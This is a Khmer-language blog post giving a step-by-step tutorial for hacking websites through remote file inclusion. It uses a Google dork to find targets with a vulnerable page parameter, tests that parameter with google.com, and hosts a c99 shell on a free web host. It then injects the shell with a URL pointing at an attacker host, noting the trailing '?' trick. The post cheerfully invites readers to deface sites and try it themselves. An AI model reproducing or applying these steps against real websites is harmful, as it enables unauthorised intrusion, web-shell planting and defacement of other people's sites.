អេសស៊ី

     សួស្ដី! ថៃ្ងនេះខ្ញុំមានអត្ថបទថ្មីមួយយកមកបង្ហាញទៀតហើយ​គឺ  ពាក់ព័ន្ធទៅ និង វិធី Hack គេហទំព័រ។ ខ្ញុំធ្លាប់បានដាក់បង្ហាញពីរ បី អត្ថបទរួចមកហើយ  ដែរអំពីវិធី Hack នេះ។

=> Hack គេហទំព័រដោយប្រើ Command Injection

=> ៦ វិធីក្នុងការ Hack គេហទំព័រ

            តោះកុំឲ្យខាត់ពេលយូរសាកល្បងតាមជំហានខាងក្រោមនេះ ៖

1. ស្វែងរកគេហទំព័រដែលងាយស្រួល Hack (Low Security)តាមរយះ Google ដោយវាយនូវ command 

    ខាងក្រោម :

            ឧ. inurl:index.php?page=

            នៅពេលដែលវាយបញ្ជូលរួចវានឹងបង្ហាញនៅគេហទំព័រណាដែលមាន Index បែបនេះ

2. ស្វែងរកគេហទំព័រណាមួយក្នុងចំណោមនោះ

            មន្ទាប់មកបន្ថែមពាក្យថា www.google.com នៅខាងក្រោយ Url នោះ :

            ឧ. www.targetsite.com/index.php?page=www.google.com

    ឧទាហរណ៏ថានេះជាគេហទំព័រដែលងាយក្នុងការ Hack => www.stev-it.com

    ដូចនេះ Hacker នឹងបញ្ជូល Url បែបនេះ www.stev-it.com/index.php?page=http://www.google.com

3. បន្ទាប់ពីវាយបញ្ជូលនិងចុចបញ្ជូនរួច Homepage របស់ Google នឹង បង្ហាញនូវគេហទំព័រនេះថាអាច      Hack បានឬមិនបាន បើសិនជាមិនបានទេសូម    ព្យាយាមទៅលើគេហទំព័រ ផ្សេងទៀត។ :p

4. យើងសន្មត់ថាគេហទំព័រនេះគឺអាច Hack បានដូចនេះ Hacker នឹងបន្តរដោយការ Upload នូវ Shells

    ដើម្បី វាយលុកចូលក្នុងគេហទំព័រ។    Shells ដែល Hacker និយមប្រើជាងគេគឺ c99 shell ឬ r57 shell.

    ក្នុងការ Hack នេះខ្ញុំប្រើនូវ c99 shell អ្នកអាចទាញយកបានដោយចុចនូវតំណរភ្ជាប់ខាងក្រោម ៖

            Download

5. ដំបូង Hacker បាន Upload shells នេះទៅក្នុង Webhosting Site ណាដែលបង្ហោះដោយទទេរ ដូចជា       ripway.com, virahosts.com, 110mb.com ឬ website ផ្សេងៗទៀត។

            យើងអាចនិយាយបានថា Hacker បានបង្ហោះshell នេះចូលក្នុងគេហទំព័ររបស់គេដែលមាន

    Url បែបនេះ => https://www.hacker.com/c99.txt?

6. ឥឡូវដល់ពេលដែល Hackerបញ្ជូល shells ចូលដើម្បីវាយប្រហារហើយ :D

            http://www.stev-it.com/index.php?page=http://www.hacker.com/c99.txt?

7. កុំភ្លេចដាក់បន្ថែម "?" នៅខាងក្រោយ.txt ផងបើមិនអញ្ជឹងទេ Shell នឹងមិនដំណើរការឡើយ។             បន្ទាប់មក Hacker នឹង អាចចូលទៅក្នុងគេហទំព័រនោះបានដោយធ្វើការបន្ថែមនូវរូបភាព ឬ កែប្រែ

    webpage ទាំងមូលដោយស្រួល។ តោះសាកមើលបានអត់? :)